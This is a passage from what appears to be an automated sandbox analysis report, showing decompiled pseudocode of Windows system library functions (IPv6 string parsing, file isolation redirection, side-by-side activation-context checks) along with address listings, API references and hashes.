						__eflags =  *_t139 - 0x25;
						if( *_t139 != 0x25) {
							L22:
							__eflags =  *_t139 - 0x5d;
							if( *_t139 != 0x5d) {
								L51:
								_t98 = _v12;
								goto L52;
							} else {
								__eflags = _v5 - 0x5b;
								if(_v5 != 0x5b) {
									goto L6;
								} else {
									_t139 = _t139 + 1;
									_v6 = _t97;
									__eflags =  *_t139 - 0x3a;
									if( *_t139 != 0x3a) {
										goto L51;
									} else {
										_t139 = _t139 + 1;
										_v16 = _t54;
										_t129 = 0x10;
										__eflags =  *_t139 - 0x30;
										if( *_t139 == 0x30) {
											_t28 = _t139 + 1; // 0x4
											_t122 = _t28;
											_v16 = 8;
											_t139 = _t122;
											_t83 =  *_t139;
											__eflags = _t83 - 0x78;
											if(_t83 == 0x78) {
												L28:
												_v16 = _t129;
												_t31 = _t122 + 1; // 0x4
												_t139 = _t31;
											} else {
												__eflags = _t83 - 0x58;
												if(_t83 == 0x58) {
													goto L28;
												}
											}
										}
										_t58 =  *_t139;
										_v5 = _t58;
										__eflags = _t58;
										if(_t58 == 0) {
											goto L51;
										} else {
											_t99 = _v12;
											do {
												_t134 = _t58;
												_t59 = E6B21CB30(_t58, _t134);
												_pop(_t107);
												__eflags = _t59;
												if(_t59 == 0) {
													L36:
													_t60 = 0x10;
													__eflags = _v16 - _t60;
													if(_v16 != _t60) {
														goto L6;
													} else {
														_t61 = E6B21CB30(_t60, _t134);
														_pop(_t108);
														__eflags = _t61;
														if(_t61 == 0) {
															goto L6;
														} else {
															_t62 = E6B21CDD0(_t108, _t134);
															__eflags = _t62;
															if(_t62 == 0) {
																goto L6;
															} else {
																_t63 = E6B21CB30(_t62, _t134);
																_pop(_t110);
																__eflags = _t63;
																if(_t63 == 0) {
																	L42:
																	_push(0x41);
																} else {
																	_t74 = E6B21CCE0(_t110, _t134);
																	__eflags = _t74;
																	if(_t74 == 0) {
																		goto L42;
																	} else {
																		_push(0x61);
																	}
																}
																_pop(_t111);
																_t68 = ((_t99 & 0x0000ffff) << 4) - _t111 + 0xa + _t134;
																__eflags = ((_t99 & 0x0000ffff) << 4) - _t111 + 0xa + _t134 - 0xffff;
																if(((_t99 & 0x0000ffff) << 4) - _t111 + 0xa + _t134 > 0xffff) {
																	goto L6;
																} else {
																	_v12 = _v12 << 4;
																	_t69 = E6B21CB30(_t68, _t134);
																	_pop(_t112);
																	__eflags = _t69;
																	if(_t69 == 0) {
																		L47:
																		_push(0x41);
																	} else {
																		_t73 = E6B21CCE0(_t112, _t134);
																		__eflags = _t73;
																		if(_t73 == 0) {
																			goto L47;
																		} else {
																			_push(0x61);
																		}
																	}
																	_pop(_t113);
																	asm("cbw");
																	_t114 = 0xa;
																	_t99 = _v12 + _v5 - _t113 + _t114;
																	__eflags = _t99;
																	_v12 = _t99;
																	goto L49;
																}
															}
														}
													}
												} else {
													_t75 = E6B21CC80(_t107, _t134);
													__eflags = _t75;
													if(_t75 == 0) {
														goto L36;
													} else {
														_t118 = _v16;
														_t130 = _t118 & 0x0000ffff;
														__eflags = _t134 - 0x30 - _t130;
														if(_t134 - 0x30 >= _t130) {
															goto L36;
														} else {
															__eflags = (_t99 & 0x0000ffff) * _t130 + 0xffffffd0 + _t134 - 0xffff;
															if((_t99 & 0x0000ffff) * _t130 + 0xffffffd0 + _t134 > 0xffff) {
																goto L6;
															} else {
																asm("cbw");
																_t82 = _t118 * _v12 - 0x00000030 + _v5 & 0x0000ffff;
																_v12 = _t82;
																_t99 = _t82;
																goto L49;
															}
														}
													}
												}
												goto L7;
												L49:
												_t139 = _t139 + 1;
												_t58 =  *_t139;
												_v5 = _t58;
												__eflags = _t58;
											} while (_t58 != 0);
											L52:
											__eflags =  *_t139;
											if( *_t139 != 0) {
												goto L6;
											} else {
												__eflags = _v6;
												if(_v6 != 0) {
													goto L6;
												} else {
													 *_a16 = _t98;
													 *_a12 = _v20;
													_t52 = 0;
												}
											}
										}
									}
								}
							}
						} else {
							_t139 = _t139 + 1;
							_t101 =  *_t139;
							_t135 = _t101;
							_t84 = E6B21CB30(_t54, _t101);
							_pop(_t123);
							__eflags = _t84;
							if(_t84 == 0) {
								goto L6;
							} else {
								_t85 = E6B21CC80(_t123, _t135);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L6;
								} else {
									__eflags = _t101;
									if(_t101 == 0) {
										L21:
										_t97 = _v12;
										_t54 = 0xa;
										goto L22;
									} else {
										_t136 = _v12;
										while(1) {
											__eflags = _t101 - 0x5d;
											if(_t101 == 0x5d) {
												goto L21;
											}
											_t102 = _t101;
											_t86 = E6B21CB30(_t85, _t102);
											_pop(_t125);
											__eflags = _t86;
											if(_t86 == 0) {
												goto L6;
											} else {
												_t87 = E6B21CC80(_t125, _t102);
												__eflags = _t87;
												if(_t87 == 0) {
													goto L6;
												} else {
													_t88 = _v20;
													_t127 = 0xa;
													_v16 = _t88 * _t127;
													asm("cdq");
													_v16 = _v16 + _t102;
													asm("adc ecx, edx");
													_t92 = _v16 + 0xffffffd0;
													asm("adc ecx, 0xffffffff");
													__eflags = _t88 * _t127 >> 0x20 - _t136;
													if(__eflags > 0) {
														goto L6;
													} else {
														if(__eflags < 0) {
															L20:
															_t85 = 0xffffffd0 + _v20 * 0xa + _t102;
															_t139 = _t139 + 1;
															_v20 = 0xffffffd0 + _v20 * 0xa + _t102;
															_t101 =  *_t139;
															__eflags = _t101;
															if(_t101 != 0) {
																continue;
															} else {
																goto L21;
															}
														} else {
															__eflags = _t92 - 0xffffffff;
															if(_t92 > 0xffffffff) {
																goto L6;
															} else {
																goto L20;
															}
														}
													}
												}
											}
											goto L7;
										}
										goto L21;
									}
								}
							}
						}
					} else {
						goto L6;
					}
				}
				L7:
				return _t52;
			}




















































                                                                                                                            0x6b1d6ca5
                                                                                                                            0x6b1d6cb0
                                                                                                                            0x6b1d6cef
                                                                                                                            0x6b1d6cef
                                                                                                                            0x6b1d6cc4
                                                                                                                            0x6b1d6cc4
                                                                                                                            0x6b1d6cc6
                                                                                                                            0x6b1d6cc8
                                                                                                                            0x6b1d6ccb
                                                                                                                            0x6b1d6cce
                                                                                                                            0x6b1d6cd1
                                                                                                                            0x6b1d6cd4
                                                                                                                            0x6b1d6cfd
                                                                                                                            0x6b1d6cfe
                                                                                                                            0x6b1d6cfe
                                                                                                                            0x6b1d6cdc
                                                                                                                            0x6b1d6ce9
                                                                                                                            0x6b231c19
                                                                                                                            0x6b231c1e
                                                                                                                            0x6b231c1f
                                                                                                                            0x6b231c22
                                                                                                                            0x6b231cc3
                                                                                                                            0x6b231cc3
                                                                                                                            0x6b231cc6
                                                                                                                            0x6b231e20
                                                                                                                            0x6b231e20
                                                                                                                            0x00000000
                                                                                                                            0x6b231ccc
                                                                                                                            0x6b231ccc
                                                                                                                            0x6b231cd0
                                                                                                                            0x00000000
                                                                                                                            0x6b231cd6
                                                                                                                            0x6b231cd6
                                                                                                                            0x6b231cd7
                                                                                                                            0x6b231cda
                                                                                                                            0x6b231cdd
                                                                                                                            0x00000000
                                                                                                                            0x6b231ce3
                                                                                                                            0x6b231ce3
                                                                                                                            0x6b231ce4
                                                                                                                            0x6b231ce9
                                                                                                                            0x6b231cea
                                                                                                                            0x6b231ced
                                                                                                                            0x6b231cef
                                                                                                                            0x6b231cef
                                                                                                                            0x6b231cf2
                                                                                                                            0x6b231cf9
                                                                                                                            0x6b231cfb
                                                                                                                            0x6b231cfd
                                                                                                                            0x6b231cff
                                                                                                                            0x6b231d05
                                                                                                                            0x6b231d05
                                                                                                                            0x6b231d08
                                                                                                                            0x6b231d08
                                                                                                                            0x6b231d01
                                                                                                                            0x6b231d01
                                                                                                                            0x6b231d03
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b231d03
                                                                                                                            0x6b231cff
                                                                                                                            0x6b231d0b
                                                                                                                            0x6b231d0d
                                                                                                                            0x6b231d10
                                                                                                                            0x6b231d12
                                                                                                                            0x00000000
                                                                                                                            0x6b231d18
                                                                                                                            0x6b231d18
                                                                                                                            0x6b231d1c
                                                                                                                            0x6b231d1c
                                                                                                                            0x6b231d20
                                                                                                                            0x6b231d25
                                                                                                                            0x6b231d26
                                                                                                                            0x6b231d28
                                                                                                                            0x6b231d76
                                                                                                                            0x6b231d78
                                                                                                                            0x6b231d79
                                                                                                                            0x6b231d7d
                                                                                                                            0x00000000
                                                                                                                            0x6b231d83
                                                                                                                            0x6b231d84
                                                                                                                            0x6b231d89
                                                                                                                            0x6b231d8a
                                                                                                                            0x6b231d8c
                                                                                                                            0x00000000
                                                                                                                            0x6b231d92
                                                                                                                            0x6b231d93
                                                                                                                            0x6b231d99
                                                                                                                            0x6b231d9b
                                                                                                                            0x00000000
                                                                                                                            0x6b231da1
                                                                                                                            0x6b231da2
                                                                                                                            0x6b231da7
                                                                                                                            0x6b231da8
                                                                                                                            0x6b231daa
                                                                                                                            0x6b231dbb
                                                                                                                            0x6b231dbb
                                                                                                                            0x6b231dac
                                                                                                                            0x6b231dad
                                                                                                                            0x6b231db3
                                                                                                                            0x6b231db5
                                                                                                                            0x00000000
                                                                                                                            0x6b231db7
                                                                                                                            0x6b231db7
                                                                                                                            0x6b231db7
                                                                                                                            0x6b231db5
                                                                                                                            0x6b231dc3
                                                                                                                            0x6b231dc9
                                                                                                                            0x6b231dcb
                                                                                                                            0x6b231dd0
                                                                                                                            0x00000000
                                                                                                                            0x6b231dd6
                                                                                                                            0x6b231dd6
                                                                                                                            0x6b231ddb
                                                                                                                            0x6b231de0
                                                                                                                            0x6b231de1
                                                                                                                            0x6b231de3
                                                                                                                            0x6b231df4
                                                                                                                            0x6b231df4
                                                                                                                            0x6b231de5
                                                                                                                            0x6b231de6
                                                                                                                            0x6b231dec
                                                                                                                            0x6b231dee
                                                                                                                            0x00000000
                                                                                                                            0x6b231df0
                                                                                                                            0x6b231df0
                                                                                                                            0x6b231df0
                                                                                                                            0x6b231dee
                                                                                                                            0x6b231dfd
                                                                                                                            0x6b231dfe
                                                                                                                            0x6b231e05
                                                                                                                            0x6b231e09
                                                                                                                            0x6b231e09
                                                                                                                            0x6b231e0c
                                                                                                                            0x00000000
                                                                                                                            0x6b231e0c
                                                                                                                            0x6b231dd0
                                                                                                                            0x6b231d9b
                                                                                                                            0x6b231d8c
                                                                                                                            0x6b231d2a
                                                                                                                            0x6b231d2b
                                                                                                                            0x6b231d31
                                                                                                                            0x6b231d33
                                                                                                                            0x00000000
                                                                                                                            0x6b231d35
                                                                                                                            0x6b231d35
                                                                                                                            0x6b231d3b
                                                                                                                            0x6b231d3e
                                                                                                                            0x6b231d40
                                                                                                                            0x00000000
                                                                                                                            0x6b231d42
                                                                                                                            0x6b231d4d
                                                                                                                            0x6b231d52
                                                                                                                            0x00000000
                                                                                                                            0x6b231d58
                                                                                                                            0x6b231d5f
                                                                                                                            0x6b231d68
                                                                                                                            0x6b231d6b
                                                                                                                            0x6b231d6e
                                                                                                                            0x00000000
                                                                                                                            0x6b231d6e
                                                                                                                            0x6b231d52
                                                                                                                            0x6b231d40
                                                                                                                            0x6b231d33
                                                                                                                            0x00000000
                                                                                                                            0x6b231e10
                                                                                                                            0x6b231e10
                                                                                                                            0x6b231e11
                                                                                                                            0x6b231e13
                                                                                                                            0x6b231e16
                                                                                                                            0x6b231e16
                                                                                                                            0x6b231e24
                                                                                                                            0x6b231e24
                                                                                                                            0x6b231e27
                                                                                                                            0x00000000
                                                                                                                            0x6b231e2d
                                                                                                                            0x6b231e2d
                                                                                                                            0x6b231e31
                                                                                                                            0x00000000
                                                                                                                            0x6b231e37
                                                                                                                            0x6b231e3e
                                                                                                                            0x6b231e47
                                                                                                                            0x6b231e49
                                                                                                                            0x6b231e49
                                                                                                                            0x6b231e31
                                                                                                                            0x6b231e27
                                                                                                                            0x6b231d12
                                                                                                                            0x6b231cdd
                                                                                                                            0x6b231cd0
                                                                                                                            0x6b231c28
                                                                                                                            0x6b231c28
                                                                                                                            0x6b231c29
                                                                                                                            0x6b231c2b
                                                                                                                            0x6b231c2f
                                                                                                                            0x6b231c34
                                                                                                                            0x6b231c35
                                                                                                                            0x6b231c37
                                                                                                                            0x00000000
                                                                                                                            0x6b231c3d
                                                                                                                            0x6b231c3e
                                                                                                                            0x6b231c44
                                                                                                                            0x6b231c46
                                                                                                                            0x00000000
                                                                                                                            0x6b231c4c
                                                                                                                            0x6b231c4c
                                                                                                                            0x6b231c4e
                                                                                                                            0x6b231cbd
                                                                                                                            0x6b231cbd
                                                                                                                            0x6b231cc2
                                                                                                                            0x00000000
                                                                                                                            0x6b231c50
                                                                                                                            0x6b231c50
                                                                                                                            0x6b231c53
                                                                                                                            0x6b231c53
                                                                                                                            0x6b231c56
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b231c58
                                                                                                                            0x6b231c5c
                                                                                                                            0x6b231c61
                                                                                                                            0x6b231c62
                                                                                                                            0x6b231c64
                                                                                                                            0x00000000
                                                                                                                            0x6b231c6a
                                                                                                                            0x6b231c6b
                                                                                                                            0x6b231c71
                                                                                                                            0x6b231c73
                                                                                                                            0x00000000
                                                                                                                            0x6b231c79
                                                                                                                            0x6b231c79
                                                                                                                            0x6b231c7e
                                                                                                                            0x6b231c81
                                                                                                                            0x6b231c88
                                                                                                                            0x6b231c89
                                                                                                                            0x6b231c8f
                                                                                                                            0x6b231c91
                                                                                                                            0x6b231c94
                                                                                                                            0x6b231c97
                                                                                                                            0x6b231c99
                                                                                                                            0x00000000
                                                                                                                            0x6b231c9f
                                                                                                                            0x6b231c9f
                                                                                                                            0x6b231caa
                                                                                                                            0x6b231cb1
                                                                                                                            0x6b231cb3
                                                                                                                            0x6b231cb4
                                                                                                                            0x6b231cb7
                                                                                                                            0x6b231cb9
                                                                                                                            0x6b231cbb
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b231ca1
                                                                                                                            0x6b231ca1
                                                                                                                            0x6b231ca4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b231ca4
                                                                                                                            0x6b231c9f
                                                                                                                            0x6b231c99
                                                                                                                            0x6b231c73
                                                                                                                            0x00000000
                                                                                                                            0x6b231c64
                                                                                                                            0x00000000
                                                                                                                            0x6b231c53
                                                                                                                            0x6b231c4e
                                                                                                                            0x6b231c46
                                                                                                                            0x6b231c37
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d6ce9
                                                                                                                            0x6b1d6cf4
                                                                                                                            0x6b1d6cfa

                                                                                                                            APIs
                                                                                                                            • RtlIpv6StringToAddressA.1105(?,00000000,?,00000000), ref: 6B1D6CE2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressIpv6String
                                                                                                                            • String ID: [
                                                                                                                            • API String ID: 27538981-784033777
                                                                                                                            • Opcode ID: 6fc8d88a6431a7faa658da00268c126386f55933642b9b9e14cb1f00605dfa96
                                                                                                                            • Instruction ID: 6fd52ad2929aca5d74cf2266c2d8bd835f1f07b2e5f96da5007c8c6134fc7c49
                                                                                                                            • Opcode Fuzzy Hash: 6fc8d88a6431a7faa658da00268c126386f55933642b9b9e14cb1f00605dfa96
                                                                                                                            • Instruction Fuzzy Hash: F2710275D0826E6AEB048A78DCA17EE7BF4AF06326F1445AAD4A0DB2C1D73CC1C2C710
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B211CC7, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 193COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 69%
                                                                                                                            			E6B211CC7(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t91;
				intOrPtr _t95;
				short _t96;
				intOrPtr _t104;
				intOrPtr _t111;
				short _t119;
				signed int _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				struct _EXCEPTION_RECORD _t143;
				intOrPtr* _t146;
				void* _t150;

				_t138 = __edx;
				_push(0x154);
				_push(0x6b2b0348);
				E6B22D0E8(__ebx, __edi, __esi);
				 *(_t150 - 0xf0) = __edx;
				_t146 = __ecx;
				 *((intOrPtr*)(_t150 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t150 - 0xf8)) =  *((intOrPtr*)(_t150 + 8));
				 *(_t150 - 0xe8) =  *(_t150 + 0xc);
				 *((intOrPtr*)(_t150 - 0xf4)) =  *((intOrPtr*)(_t150 + 0x10));
				 *((intOrPtr*)(_t150 - 0xe4)) = 0;
				 *(_t150 - 0xdc) = 0;
				 *((intOrPtr*)(_t150 - 0xd8)) = 0;
				 *(_t150 - 0xe0) = 0;
				 *((intOrPtr*)(_t150 - 0x140)) = 0x40;
				memset(_t150 - 0x13c, 0, 0x3c);
				 *((intOrPtr*)(_t150 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t150 - 0x160)) = 1;
				_t130 = 7;
				memset(_t150 - 0x15c, 0, _t130 << 2);
				_t143 =  *(_t150 - 0xe8);
				_t91 = E6B1F2430(1, _t146, 0,  *((intOrPtr*)(_t150 - 0xf8)), _t143,  *((intOrPtr*)(_t150 - 0xf4)), _t150 - 0xe0, 0, 0);
				_t147 = _t91;
				if(_t91 >= 0) {
					if( *0x6b2c8460 != 0 && ( *(_t150 - 0xe0) & 0x00000001) == 0) {
						_t95 = E6B1F2D50(7, 0, 2,  *((intOrPtr*)(_t150 - 0xfc)), _t150 - 0x140);
						_t147 = _t95;
						if(_t95 < 0) {
							goto L1;
						}
						if( *(_t150 - 0x13c) == 1) {
							if(( *(_t150 - 0x118) & 0x00000001) == 0) {
								if(( *(_t150 - 0x118) & 0x00000002) != 0) {
									 *(_t150 - 0x120) = 0xfffffffc;
								}
							} else {
								 *(_t150 - 0x120) =  *(_t150 - 0x120) & 0x00000000;
							}
							_t133 =  *((intOrPtr*)(_t150 - 0x114));
							_t96 =  *((intOrPtr*)(_t133 + 0x5c));
							 *((short*)(_t150 - 0xda)) = _t96;
							 *(_t150 - 0xdc) = _t96;
							 *((intOrPtr*)(_t150 - 0xd8)) =  *((intOrPtr*)(_t133 + 0x60)) +  *((intOrPtr*)(_t150 - 0x110));
							 *(_t150 - 0xe8) = _t150 - 0xd0;
							 *((short*)(_t150 - 0xea)) = 0xaa;
							_t104 = E6B1E4720(_t138,  *(_t150 - 0xf0) & 0x0000ffff, _t150 - 0xec, 2, 0);
							_t147 = _t104;
							if(_t104 < 0 || RtlCompareUnicodeString(_t150 - 0xdc, _t150 - 0xec, 1) == 0) {
								goto L1;
							} else {
								 *0x6b2cb1e0( *(_t150 - 0x120),  *(_t150 - 0xf0), _t150 - 0xe4);
								_t147 =  *((intOrPtr*)( *0x6b2c8460))();
								 *((intOrPtr*)(_t150 - 0xd4)) = _t147;
								if(_t147 < 0) {
									goto L1;
								}
								_t111 =  *((intOrPtr*)(_t150 - 0xe4));
								if(_t111 == 0xffffffff) {
									L25:
									 *((intOrPtr*)(_t150 - 4)) = 1;
									_t143 =  *0x6b2c8468;
									if(_t143 != 0) {
										 *0x6b2cb1e0(_t111);
										 *_t143();
									}
									 *((intOrPtr*)(_t150 - 4)) = 0xfffffffe;
									goto L1;
								}
								E6B1EF540(_t150 - 0x164, _t111);
								 *((intOrPtr*)(_t150 - 4)) = 0;
								if( *((intOrPtr*)(_t143 + 4)) != 0) {
									RtlFreeUnicodeString(_t143);
								}
								_t144 =  *((intOrPtr*)(_t150 - 0xfc));
								_t147 = E6B1F2430(0,  *((intOrPtr*)(_t150 - 0xfc)), 0,  *((intOrPtr*)(_t150 - 0xf8)), _t143,  *((intOrPtr*)(_t150 - 0xf4)), _t150 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t150 - 0xd4)) = _t147;
								if(_t147 < 0) {
									L24:
									 *((intOrPtr*)(_t150 - 4)) = 0xfffffffe;
									_t111 = E6B24D704();
									goto L25;
								} else {
									_t147 = E6B1F2D50(7, 0, 2, _t144, _t150 - 0x140);
									 *((intOrPtr*)(_t150 - 0xd4)) = _t147;
									if(_t147 < 0) {
										goto L24;
									}
									if( *(_t150 - 0x13c) == 1) {
										_t137 =  *((intOrPtr*)(_t150 - 0x114));
										_t119 =  *((intOrPtr*)(_t137 + 0x5c));
										 *((short*)(_t150 - 0xda)) = _t119;
										 *(_t150 - 0xdc) = _t119;
										 *((intOrPtr*)(_t150 - 0xd8)) =  *((intOrPtr*)(_t137 + 0x60)) +  *((intOrPtr*)(_t150 - 0x110));
										if(RtlCompareUnicodeString(_t150 - 0xdc, _t150 - 0xec, 1) == 0) {
											goto L24;
										}
										_t147 = 0xc0150004;
										L23:
										 *((intOrPtr*)(_t150 - 0xd4)) = _t147;
										goto L24;
									}
									_t147 = 0xc0150005;
									goto L23;
								}
							}
						}
						_t147 = 0xc0150005;
					}
				}
				L1:
				return E6B22D130(1, _t143, _t147);
			}















                                                                                                                            0x6b211cc7
                                                                                                                            0x6b211cc7
                                                                                                                            0x6b211ccc
                                                                                                                            0x6b211cd1
                                                                                                                            0x6b211cd6
                                                                                                                            0x6b211cdc
                                                                                                                            0x6b211cde
                                                                                                                            0x6b211ce7
                                                                                                                            0x6b211cf0
                                                                                                                            0x6b211cf9
                                                                                                                            0x6b211d01
                                                                                                                            0x6b211d09
                                                                                                                            0x6b211d0f
                                                                                                                            0x6b211d15
                                                                                                                            0x6b211d1b
                                                                                                                            0x6b211d2f
                                                                                                                            0x6b211d37
                                                                                                                            0x6b211d44
                                                                                                                            0x6b211d4c
                                                                                                                            0x6b211d55
                                                                                                                            0x6b211d68
                                                                                                                            0x6b211d78
                                                                                                                            0x6b211d7d
                                                                                                                            0x6b211d81
                                                                                                                            0x6b24d4e3
                                                                                                                            0x6b24d509
                                                                                                                            0x6b24d50e
                                                                                                                            0x6b24d512
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b24d51e
                                                                                                                            0x6b24d531
                                                                                                                            0x6b24d543
                                                                                                                            0x6b24d545
                                                                                                                            0x6b24d545
                                                                                                                            0x6b24d533
                                                                                                                            0x6b24d533
                                                                                                                            0x6b24d533
                                                                                                                            0x6b24d54f
                                                                                                                            0x6b24d555
                                                                                                                            0x6b24d559
                                                                                                                            0x6b24d560
                                                                                                                            0x6b24d570
                                                                                                                            0x6b24d57c
                                                                                                                            0x6b24d587
                                                                                                                            0x6b24d5a3
                                                                                                                            0x6b24d5a8
                                                                                                                            0x6b24d5ac
                                                                                                                            0x00000000
                                                                                                                            0x6b24d5ce
                                                                                                                            0x6b24d5e9
                                                                                                                            0x6b24d5f1
                                                                                                                            0x6b24d5f3
                                                                                                                            0x6b24d5fb
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b24d601
                                                                                                                            0x6b24d60a
                                                                                                                            0x6b24d6e1
                                                                                                                            0x6b24d6e1
                                                                                                                            0x6b24d6e4
                                                                                                                            0x6b24d6ec
                                                                                                                            0x6b24d6f1
                                                                                                                            0x6b24d6f7
                                                                                                                            0x6b24d6f7
                                                                                                                            0x6b24d730
                                                                                                                            0x00000000
                                                                                                                            0x6b24d730
                                                                                                                            0x6b24d618
                                                                                                                            0x6b24d61f
                                                                                                                            0x6b24d625
                                                                                                                            0x6b24d628
                                                                                                                            0x6b24d628
                                                                                                                            0x6b24d644
                                                                                                                            0x6b24d651
                                                                                                                            0x6b24d653
                                                                                                                            0x6b24d65b
                                                                                                                            0x6b24d6d5
                                                                                                                            0x6b24d6d5
                                                                                                                            0x6b24d6dc
                                                                                                                            0x00000000
                                                                                                                            0x6b24d65d
                                                                                                                            0x6b24d670
                                                                                                                            0x6b24d672
                                                                                                                            0x6b24d67a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b24d682
                                                                                                                            0x6b24d68b
                                                                                                                            0x6b24d691
                                                                                                                            0x6b24d695
                                                                                                                            0x6b24d69c
                                                                                                                            0x6b24d6ac
                                                                                                                            0x6b24d6c8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b24d6ca
                                                                                                                            0x6b24d6cf
                                                                                                                            0x6b24d6cf
                                                                                                                            0x00000000
                                                                                                                            0x6b24d6cf
                                                                                                                            0x6b24d684
                                                                                                                            0x00000000
                                                                                                                            0x6b24d684
                                                                                                                            0x6b24d65b
                                                                                                                            0x6b24d5ac
                                                                                                                            0x6b24d520
                                                                                                                            0x6b24d520
                                                                                                                            0x6b24d4e3
                                                                                                                            0x6b211d87
                                                                                                                            0x6b211d8e

                                                                                                                            APIs
                                                                                                                            • memset.1105(?,00000000,0000003C,6B2B0348,00000154,6B1EBC93,02BE0000,?,?,?,.mui,?,?,?,?,?), ref: 6B211D2F
                                                                                                                            • RtlDosApplyFileIsolationRedirection_Ustr.1105(00000001,?,00000000,?,?,?,?,00000000,00000000), ref: 6B211D78
                                                                                                                            • RtlFindActivationContextSectionString.1105(00000007,00000000,00000002,?,?,00000001,?,00000000,?,?,?,?,00000000,00000000), ref: 6B24D509
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ActivationApplyContextFileFindIsolationRedirection_SectionStringUstrmemset
                                                                                                                            • String ID: $$@
                                                                                                                            • API String ID: 2010900335-1194432280
                                                                                                                            • Opcode ID: 685292de162e7249d96fb16abf0ae60d35447b41e3ab3f5cc30f4aad58ce5498
                                                                                                                            • Instruction ID: d46a1799b8c06223ca9a0aabb0edcb0d26b3f0b05b2afd07dbbe598bc9c39746
                                                                                                                            • Opcode Fuzzy Hash: 685292de162e7249d96fb16abf0ae60d35447b41e3ab3f5cc30f4aad58ce5498
                                                                                                                            • Instruction Fuzzy Hash: 83814671D4026D9BDB25CB64CC85BEAB6F8AB09744F0041EAA91DB7280D7749E85CFA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D8EE6, Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 148COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • SXS: %s() found assembly information section with element list overlapping section header Section header: %p Header Size: %lu ElementListOffset: %lu, xrefs: 6B233577
                                                                                                                            • SXS: %s() found assembly information section with user data overlapping section header Section header: %p Header Size: %lu User Data Offset: %lu, xrefs: 6B23359D
                                                                                                                            • SsHd, xrefs: 6B1D8F1B
                                                                                                                            • SXS: %s() found assembly information section with user data too small Section header: %p UserDataSize: %lu; needed: %lu, xrefs: 6B23355D
                                                                                                                            • SXS: %s() found assembly information section with search structure overlapping section header Section header: %p Header Size: %lu SearchStructureOffset: %lu, xrefs: 6B23358E
                                                                                                                            • SXS: %s() found assembly information section with wrong magic value Expected %lu; got %lu, xrefs: 6B23353D
                                                                                                                            • SXS: %s() passed string section at %p with too small of a header HeaderSize: %lu Required: %lu, xrefs: 6B23354D
                                                                                                                            • RtlpCrackActivationContextStringSectionHeader, xrefs: 6B2334EC, 6B2334FA, 6B233517, 6B233538, 6B233548, 6B233558, 6B233572, 6B233589, 6B233598
                                                                                                                            • SXS: %s() passed string section at %p only %Iu bytes long; that's not even enough for the 4-byte magic and 4-byte header length!, xrefs: 6B2334F1
                                                                                                                            • SXS: %s() found assembly information section with user data extending beyond section data Section header: %p UserDataSize: %lu UserDataOffset: %lu Section size: %Iu, xrefs: 6B23351C
                                                                                                                            • SXS: %s() passed string section at %p claims %lu byte header size; that doesn't even include the HeaderSize member!, xrefs: 6B2334FF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
